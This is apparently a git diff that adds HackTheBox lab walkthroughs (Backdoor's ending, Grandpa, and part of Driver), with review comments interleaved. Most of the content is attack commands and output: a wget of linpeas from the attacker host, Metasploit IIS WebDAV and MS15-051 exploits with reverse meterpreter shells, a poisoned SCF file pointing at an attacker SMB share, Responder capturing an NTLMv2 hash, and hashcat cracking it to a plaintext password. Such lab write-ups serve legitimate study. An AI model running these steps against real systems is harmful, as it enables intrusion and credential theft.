+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ user@Backdoor:/home/user$ wget http://10.10.14.37:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-11-30 10:11:59-- http://10.10.14.37:9090/linpeas.sh
+ Connecting to 10.10.14.37:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 827827 (808K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[===================>] 808.42K 266KB/s in 3.0s
+
+ 2022-11-30 10:12:03 (266 KB/s) - ‘/tmp/peas.sh’ saved [827827/827827]
+
+ user@Backdoor:/home/user$ chmod +x /tmp/peas.sh
+ user@Backdoor:/home/user$ /tmp/peas.sh
+
+
+
+
+Let it run, then in the output we see more info regarding gdbserver, but we can also see it with the ps command:
+
+
+ user@Backdoor:/home/user$ ps auxww | grep gdb
+ root 945 0.0 0.0 2608 1796 ? Ss 08:39 0:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
+ root 14328 0.0 0.1 8404 3880 ? S 10:06 0:00 su user -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14332 0.0 0.1 6892 3316 ? Ss 10:06 0:00 bash -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14336 0.0 0.2 11844 4160 ? S 10:06 0:00 gdbserver --once 0.0.0.0:1337 /bin/true
+ user 31115 0.0 0.0 6632 732 pts/2 S+ 10:16 0:00 grep --color=auto gdb
+
+ user@Backdoor:/home/user$ ps auxww | grep true
+ root 945 0.0 0.0 2608 1796 ? Ss 08:39 0:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
+ root 950 0.0 0.0 2608 1544 ? Ss 08:39 0:02 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
+ root 14328 0.0 0.1 8404 3880 ? S 10:06 0:00 su user -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14332 0.0 0.1 6892 3316 ? Ss 10:06 0:00 bash -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14336 0.0 0.2 11844 4160 ? S 10:06 0:00 gdbserver --once 0.0.0.0:1337 /bin/true
+ user 31338 0.0 0.0 6632 732 pts/2 S+ 10:17 0:00 grep --color=auto true
+
+
+
+When looking at the processes, we see that there is also a script running **screen** as the root user, so let's enumerate it:
+
+
+ user@Backdoor:/home/user$ screen -ls
+ No Sockets found in /run/screen/S-user.
+
+ user@Backdoor:/home/user$ screen -ls root/
+ There is a suitable screen on:
+ 995.root (11/30/22 08:39:42) (Multi, detached)
+ 1 Socket in /run/screen/S-root.
+
+
+
+Here we see the root user is running screen on the socket /root/screen/S-root, so we connect to it:
+
+
+ user@Backdoor:/home/user$ screen -x root/995
+ root@Backdoor:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@Backdoor:~# cat root.txt
+ 2dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
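Review bot: the sentence "Here we see the root user is running screen on the socket /root/screen/S-root" contradicts the output directly above it: `screen -ls root/` reports "1 Socket in /run/screen/S-root." and the root loop in the `ps auxww | grep true` listing runs `find /var/run/screen/S-root/ -empty -exec screen -dmS root \;`, so the path should read /run/screen/S-root. The same paragraph would be clearer if it named the actual root cause instead of only the command: the session is listed as "(Multi, detached)", i.e. screen's multiuser mode, which is what lets another account attach with `screen -x root/995`, and the `find ... -empty -exec screen -dmS root` loop recreates a detached root session whenever none exists, so the misconfiguration is permanent. Further up, the gdbserver step only links to hacktricks; one sentence stating that gdbserver is listening on 0.0.0.0:1337 with no authentication (visible in the `ps auxww | grep gdb` output) and that `remote put` followed by `run` therefore executes any uploaded binary as the `user` account would make the writeup self-contained. Finally, the Conclusion reads "Here we can see the progress graph :" but no image reference follows; add the image link or drop the sentence.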
diff --git a/Easy/7.md b/Easy/7.md
new file mode 100644
index 0000000..936c118
--- /dev/null
+++ b/Easy/7.md
@@ -0,0 +1,391 @@
+# Grandpa Writeup
+
+
+
+## Introduction :
+
+Grandpa was an Easy Windows box released back in april 2017. It features a well known service with alot of metasploit options for us to work with.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ root [ 10.10.14.48/23 ] [/home/nihilist] → nmap -sC -sV 10.10.10.14**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 16:54 CET
+ Nmap scan report for 10.10.10.14
+ Host is up (0.035s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 6.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
+ | http-ntlm-info:
+ | Target_Name: GRANPA
+ | NetBIOS_Domain_Name: GRANPA
+ | NetBIOS_Computer_Name: GRANPA
+ | DNS_Domain_Name: granpa
+ | DNS_Computer_Name: granpa
+ |_ Product_Version: 5.2.3790
+ |_http-server-header: Microsoft-IIS/6.0
+ |_http-title: Under Construction
+ | http-webdav-scan:
+ | Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
+ | Server Date: Mon, 11 Nov 2019 15:57:04 GMT
+ | Server Type: Microsoft-IIS/6.0
+ | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ |_ WebDAV type: Unknown
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Firt of all let's see if IIS 6.0 has any publicly-known vulnerabilities using the **searchsploit** command.
+
+
+ λ nihilist [ 93.23.12.196 ] [~] → searchsploit IIS 6.0
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disc | exploits/windows/remote/21057.txt
+ Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | exploits/windows/remote/9541.pl
+ Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | exploits/windows/dos/9587.txt
+ Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | exploits/windows/dos/3965.pl
+ Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service | exploits/windows/dos/15167.txt
+ Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | exploits/windows/remote/41738.py
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | exploits/windows/remote/8704.txt
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | exploits/windows/remote/8806.pl
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | exploits/windows/remote/8765.php
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | exploits/windows/remote/8754.patch
+ Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | exploits/windows/remote/19033.txt
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+For the first part we will try the exploit named "scstoragepathfromurl" which should give us a low privilege meterpreter session on the machine.
+
+
+ msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
+
+ Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ MAXPATHLENGTH 60 yes End of physical path brute force
+ MINPATHLENGTH 3 yes Start of physical path brute force
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Path of IIS 6 web application
+ VHOST no HTTP server virtual host
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Microsoft Windows Server 2003 R2 SP2 x86
+
+
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOST 10.10.10.14
+ RHOST => 10.10.10.14
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
+ [+] 10.10.10.14:80 - The target is vulnerable.
+
+
+By typing the msf keyword **"Check"** We see that metasploit tells us that the target should be vulnerable to the iis webdav scs storagepath fromurl vulnerability. Let's test it.
+
+
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Trying path length 3 to 60 ...
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.14:1030) at 2019-11-11 16:56:26 +0100
+
+ meterpreter > sysinfo
+ Computer : GRANPA
+ OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
+ Architecture : x86
+ System Language : en_US
+ Domain : HTB
+ Logged On Users : 2
+ Meterpreter : x86/windows
+ meterpreter >
+
+
+
+ meterpreter > shell
+ [-] Failed to spawn shell with thread impersonation. Retrying without it.
+ Process 2820 created.
+ Channel 2 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ c:\windows\system32\inetsrv>cd ../../..
+ cd ../../..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\
+
+ 04/12/2017 04:27 PM **IR> ADFS
+ 04/12/2017 04:04 PM 0 AUTOEXEC.BAT
+ 04/12/2017 04:04 PM 0 CONFIG.SYS
+ 04/12/2017 04:32 PM **IR> Documents and Settings
+ 04/12/2017 04:17 PM **IR> FPSE_search
+ 04/12/2017 04:17 PM **IR> Inetpub
+ 12/24/2017 07:18 PM **IR> Program Files
+ 12/24/2017 07:27 PM **IR> WINDOWS
+ 04/12/2017 04:05 PM **IR> wmpub
+ 2 File(s) 0 bytes
+ 7 Dir(s) 18,127,511,552 bytes free
+
+ C:\>cd Documents And Settings
+ cd Documents And Settings
+
+ C:\Documents and Settings>cd Harry
+ cd Harry
+ Access is denied.
+
+ C:\Documents and Settings>exit
+ meterpreter >
+
+
+We now have a low-privileged meterpreter session, let's see what processes are running on this machine to see if we could migrate to it.
+
+
+ meterpreter > ps
+
+ Process List
+ ============
+
+ PID PPID Name Arch Session User Path
+ --- ---- ---- ---- ------- ---- ----
+ 0 0 [System Process]
+ 4 0 System
+ 272 4 smss.exe
+ 324 272 csrss.exe
+ 348 272 winlogon.exe
+ 396 348 services.exe
+ 408 348 lsass.exe
+ 616 396 svchost.exe
+ 680 396 svchost.exe
+ 740 396 svchost.exe
+ 768 396 svchost.exe
+ 804 396 svchost.exe
+ 940 396 spoolsv.exe
+ 968 396 msdtc.exe
+ 1080 396 cisvc.exe
+ 1124 396 svchost.exe
+ 1184 396 inetinfo.exe
+ 1220 396 svchost.exe
+ 1328 396 VGAuthService.exe
+ 1416 396 vmtoolsd.exe
+ 1464 396 svchost.exe
+ 1604 396 svchost.exe
+ 1716 396 alg.exe
+ 1796 396 dllhost.exe
+ **1824 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe**
+ 1920 396 dllhost.exe
+ 2024 1464 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
+ 2124 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
+ 2232 396 vssvc.exe
+ 2288 2024 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
+
+ meterpreter > migrate 1824
+ [*] Migrating from 2288 to 1824...
+
+
+
+ meterpreter > migrate 1824
+ [*] Migrating from 2288 to 1824...
+ [-] Error running command migrate: Rex::TimeoutError Operation timed out.
+ meterpreter > exit
+ [*] Shutting down Meterpreter...
+
+ [*] 10.10.10.14 - Meterpreter session 3 closed. Reason: User exit
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Trying path length 3 to 60 ...
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [*] Meterpreter session 4 opened (10.10.14.48:4444 -> 10.10.10.14:1032) at 2019-11-11 17:11:01 +0100
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [*] Meterpreter session 5 opened (10.10.14.48:4444 -> 10.10.10.14:1031) at 2019-11-11 17:11:08 +0100
+
+ meterpreter > shell
+ Process 2996 created.
+ Channel 1 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>whoami
+ whoami
+ nt authority\network service
+
+ C:\WINDOWS\system32>
+
+
+We seem to have elevated a few privileges, but that's not enough as you can see below.
+
+
+ C:\WINDOWS\system32>cd ../..
+ cd ../..
+
+ C:\>cd Documents and Settings
+ cd Documents and Settings
+
+ C:\Documents and Settings>cd Harry
+ cd Harry
+ Access is denied.
+
+ C:\Documents and Settings>cd Administrator
+ cd Administrator
+ Access is denied.
+
+ C:\Documents and Settings>exit
+ exit
+
+
+Let's see if we can effectively privesc on this machine. We will run the local exploit suggester on our meterpreter session.
+
+
+ meterpreter > run post/multi/recon/local_exploit_suggester
+
+ [*] 10.10.10.14 - Collecting local exploits for x86/windows...
+ [*] 10.10.10.14 - 29 exploit checks are being tried...
+ [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
+ [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
+ [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
+
+ [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
+
+ [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
+ [+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
+ [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
+ [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
+ [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
+
+
+We have got plenty of exploits to try ! Let's find out which will give us an elevated privilege meterpreter session.
+
+## **Part 3 : The Root Access**
+
+After a couple of failed attempts at finding the correct local exploit for grandpa, i finally tried the exploit **ms15_051_client_copy_image**. It is an exploit which takes advantage of Windows Kernel-Mode Drivers's vulnerabilities, which should effectively give us an elevation of privilege for our meterpreter session.
+
+
+ meterpreter > background
+ [*] Backgrounding session 5...
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms15_051_client_copy_image
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > show options
+
+ Module options (exploit/windows/local/ms15_051_client_copy_image):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ SESSION yes The session to run this module on.
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Windows x86
+
+
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 5
+ SESSION => 5
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp
+ PAYLOAD => windows/meterpreter/reverse_tcp
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.48
+ LHOST => 10.10.14.48
+
+
+We use the aforementionned exploit and set the payload to **windows/meterpreter/reverse_tcp** with the correct LHOST parameter for the elevated privilege meterpreter to connect back to our host machine. Let's run it to see if we can effectively privesc this machine.
+
+
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > run
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Launching notepad to host the exploit...
+ [+] Process 3496 launched.
+ [*] Reflectively injecting the exploit DLL into 3496...
+ [*] Injecting exploit into 3496...
+ [*] Exploit injected. Injecting payload into 3496...
+ [*] Payload injected. Executing exploit...
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+ [*] Meterpreter session 6 opened (10.10.14.48:4444 -> 10.10.10.14:1035) at 2019-11-11 17:20:34 +0100
+
+ meterpreter > shell
+ Process 3652 created.
+ Channel 1 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>whoami
+ whoami
+ nt authority\system
+
+ C:\WINDOWS\system32>cd ../../..
+ cd ../../..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\
+
+ 04/12/2017 04:27 PM **IR> ADFS
+ 04/12/2017 04:04 PM 0 AUTOEXEC.BAT
+ 04/12/2017 04:04 PM 0 CONFIG.SYS
+ 04/12/2017 04:32 PM **IR> Documents and Settings
+ 04/12/2017 04:17 PM **IR> FPSE_search
+ 04/12/2017 04:17 PM **IR> Inetpub
+ 12/24/2017 07:18 PM **IR> Program Files
+ 12/24/2017 07:27 PM **IR> WINDOWS
+ 04/12/2017 04:05 PM **IR> wmpub
+ 2 File(s) 0 bytes
+ 7 Dir(s) 18,127,536,128 bytes free
+
+ C:\>cd Documents and Settings
+ cd Documents and Settings
+
+ C:\Documents and Settings>cd Harry
+ cd Harry
+
+ C:\Documents and Settings\Harry>cd Desktop
+ cd Desktop
+
+ C:\Documents and Settings\Harry\Desktop>more user.txt
+ more user.txt
+ bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ C:\Documents and Settings\Harry\Desktop>cd ../../Administrator/Desktop
+ cd ../../Administrator/Desktop
+
+ C:\Documents and Settings\Administrator\Desktop>more root.txt
+ more root.txt
+ 93XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And thats it ! **exploit/windows/local/ms15_051_client_copy_image** returned our meterpreter session as NT AUTHORITY\ SYSTEM, and we have been able to get both the user and root flags.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
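Review bot: "We seem to have elevated a few privileges" after the second `exploit` is not supported by the transcript: the `migrate 1824` into wmiprvse.exe timed out (Rex::TimeoutError), and the shell in session 5 reports `nt authority\network service`, which is the same account the `ps` listing shows for w3wp.exe (PID 2024, the parent of the rundll32.exe 2288 that the first session lived in), so nothing was elevated at that point; reword to say the session was simply re-established as NETWORK SERVICE and that privilege escalation follows in Part 3. The `migrate 1824` block is also pasted twice (once cut off after "Migrating from 2288 to 1824...", then again with the error); keep only the complete one. Smaller points: the prose says `"Check"` but the command as run is lowercase `check`; "Firt of all", "alot", "april", "aforementionned", "Drivers's vulnerabilities" and "thats it" need fixing; the `**IR>` fragments in both `dir` listings appear to be `<DIR>` mangled by markdown and should be escaped; and the Conclusion's "Here we can see the progress graph :" is followed by no image reference.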
diff --git a/Easy/70.md b/Easy/70.md
new file mode 100644
index 0000000..cbc822c
--- /dev/null
+++ b/Easy/70.md
@@ -0,0 +1,426 @@
+# Driver Writeup
+
+
+
+## Introduction :
+
+Driver is an easy Linux box released back in October 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB]
+ → nmap -sCV driver.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 18:39 UTC
+ Nmap scan report for driver.htb (10.129.95.238)
+ Host is up (0.054s latency).
+ Not shown: 997 filtered tcp ports (no-response)
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Basic realm=MFP Firmware Update Center. Please enter password for admin
+ |_http-server-header: Microsoft-IIS/10.0
+ |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
+ Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb2-security-mode:
+ | 3.1.1:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2022-11-22T01:39:18
+ |_ start_date: 2022-11-22T01:38:10
+ |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 53.89 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+We try randomly admin:admin as the credentials and we login:
+
+
+
+Now in order to exploit this MFP Firmware Update Center we need to make a scf file as seen [here](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/):
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Driver]
+ → vim file.scf
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Driver]
+ → cat file.scf
+ [Shell]
+ Command = 2
+ IconFile = "\\10.10.16.14\nihilism\nothing.txt"
+
+ [Taskbar]
+ Command = "ToggleDesktop"
+
+
+
+Then start a responder session as we upload the poisoned file:
+
+
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Driver]
+ → sudo responder -I tun0
+ __
+ .----.-----.-----.-----.-----.-----.--| |.-----.----.
+ | _| -__|__ --| _ | _ | | _ || -__| _|
+ |__| |_____|_____| __|_____|__|__|_____||_____|__|
+ |__|
+
+ NBT-NS, LLMNR & MDNS Responder 3.1.3.0
+
+ To support this project:
+ Patreon -> https://www.patreon.com/PythonResponder
+ Paypal -> https://paypal.me/PythonResponder
+
+ Author: Laurent Gaffie (laurent.gaffie@gmail.com)
+ To kill this script hit CTRL-C
+
+
+ [+] Poisoners:
+ LLMNR [ON]
+ NBT-NS [ON]
+ MDNS [ON]
+ DNS [ON]
+ DHCP [OFF]
+
+ [+] Servers:
+ HTTP server [ON]
+ HTTPS server [ON]
+ WPAD proxy [OFF]
+ Auth proxy [OFF]
+ SMB server [ON]
+ Kerberos server [ON]
+ SQL server [ON]
+ FTP server [ON]
+ IMAP server [ON]
+ POP3 server [ON]
+ SMTP server [ON]
+ DNS server [ON]
+ LDAP server [ON]
+ RDP server [ON]
+ DCE-RPC server [ON]
+ WinRM server [ON]
+
+ [+] HTTP Options:
+ Always serving EXE [OFF]
+ Serving EXE [OFF]
+ Serving HTML [OFF]
+ Upstream Proxy [OFF]
+
+ [+] Poisoning Options:
+ Analyze Mode [OFF]
+ Force WPAD auth [OFF]
+ Force Basic Auth [OFF]
+ Force LM downgrade [OFF]
+ Force ESS downgrade [OFF]
+
+ [+] Generic Options:
+ Responder NIC [tun0]
+ Responder IP [10.10.16.14]
+ Responder IPv6 [dead:beef:4::100c]
+ Challenge set [random]
+ Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
+
+ [+] Current Session Variables:
+ Responder Machine Name [WIN-KPBKT26EKRE]
+ Responder Domain Name [3PO9.LOCAL]
+ Responder DCE-RPC Port [49204]
+
+ [+] Listening for events...
+
+
+ **[SMB] NTLMv2-SSP Client : 10.129.95.238
+ [SMB] NTLMv2-SSP Username : DRIVER\tony
+ [SMB] NTLMv2-SSP Hash : tony::DRIVER:64ee36aaad12f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
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony**
+
+
+And we got a response on our file gets uploaded! So we recieved a NTLMv2 Hash, coming from the username tony. So let's crack the NTLMv2 Hash using rockyou.txt:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Driver]
+ → sudo hashcat hash -m5600 $(locate rockyou.txt)
+ [sudo] password for nothing:
+ hashcat (v6.2.6) starting
+
+ * Device #1: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ * Device #2: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ CUDA API (CUDA 11.8)
+ ====================
+ * Device #1: NVIDIA GeForce RTX 3070 Ti, 5906/7981 MB, 48MCU
+
+ OpenCL API (OpenCL 3.0 CUDA 11.8.87) - Platform #1 [NVIDIA Corporation]
+ =======================================================================
+ * Device #2: NVIDIA GeForce RTX 3070 Ti, skipped
+
+ Minimum password length supported by kernel: 0
+ Maximum password length supported by kernel: 256
+
+ Hashes: 1 digests; 1 unique digests, 1 unique salts
+ Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
+ Rules: 1
+
+ Optimizers applied:
+ * Zero-Byte
+ * Not-Iterated
+ * Single-Hash
+ * Single-Salt
+
+ ATTENTION! Pure (unoptimized) backend kernels selected.
+ Pure kernels can crack longer passwords, but drastically reduce performance.
+ If you want to switch to optimized kernels, append -O to your commandline.
+ See the above message to find out about the exact limits.
+
+ Watchdog: Temperature abort trigger set to 90c
+
+ Host memory required for this attack: 843 MB
+
+ Dictionary cache built:
+ * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
+ * Passwords.: 14344392
+ * Bytes.....: 139923457
+ * Keyspace..: 14344383
+ * Runtime...: 1 sec
+
+ TONY::DRIVER:64ee36aaad12f422:90cd51833ec5c7fd768608dc128b0072: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:liltony
+
+ Session..........: hashcat
+ Status...........: Cracked
+ Hash.Mode........: 5600 (NetNTLMv2)
+ Hash.Target......: TONY::DRIVER:64ee36aaad12f422:90cd51833ec5c7fd76860...000000
+ Time.Started.....: Mon Nov 21 19:57:17 2022 (1 sec)
+ Time.Estimated...: Mon Nov 21 19:57:18 2022 (0 secs)
+ Kernel.Feature...: Pure Kernel
+ Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz)
+ Guess.Queue......: 1/1 (100.00%)
+ Speed.#1.........: 69153.6 kH/s (3.71ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
+ Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
+ Progress.........: 3145728/14344383 (21.93%)
+ Rejected.........: 0/3145728 (0.00%)
+ Restore.Point....: 0/14344383 (0.00%)
+ Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
+ Candidate.Engine.: Device Generator
+ Candidates.#1....: 12345 -> tomabogdan
+ Hardware.Mon.#1..: Temp: 53c Fan: 57% Util: 30% Core:1830MHz Mem:9501MHz Bus:16
+
+ Started: Mon Nov 21 19:57:11 2022
+ Stopped: Mon Nov 21 19:57:18 2022
+
+
+
+So now we have the credentials **tony:liltony** , let's connect with an evil-winrm shell :
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [Nextcloud/blog]
+ → evil-winrm -i driver.htb -u tony -p liltony
+
+ Evil-WinRM shell v3.4
+
+ Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
+
+ Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> whoami
+ driver\tony
+ *Evil-WinRM* PS C:\Users\tony\Documents> cd ..
+ cd De*Evil-WinRM* PS C:\Users\tony> cd Desktop
+ *Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
+ 97XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the User flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to enumerate privesc paths, we run winpeas:
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [Nextcloud/blog]
+ → evil-winrm -i driver.htb -u tony -p liltony
+
+ Evil-WinRM shell v3.4
+
+ Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
+
+ Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> upload /home/nothing/HTB/Driver/winPEAS.bat
+ Info: Uploading /home/nothing/HTB/Driver/winPEAS.bat to C:\Users\tony\Documents\winPEAS.bat
+
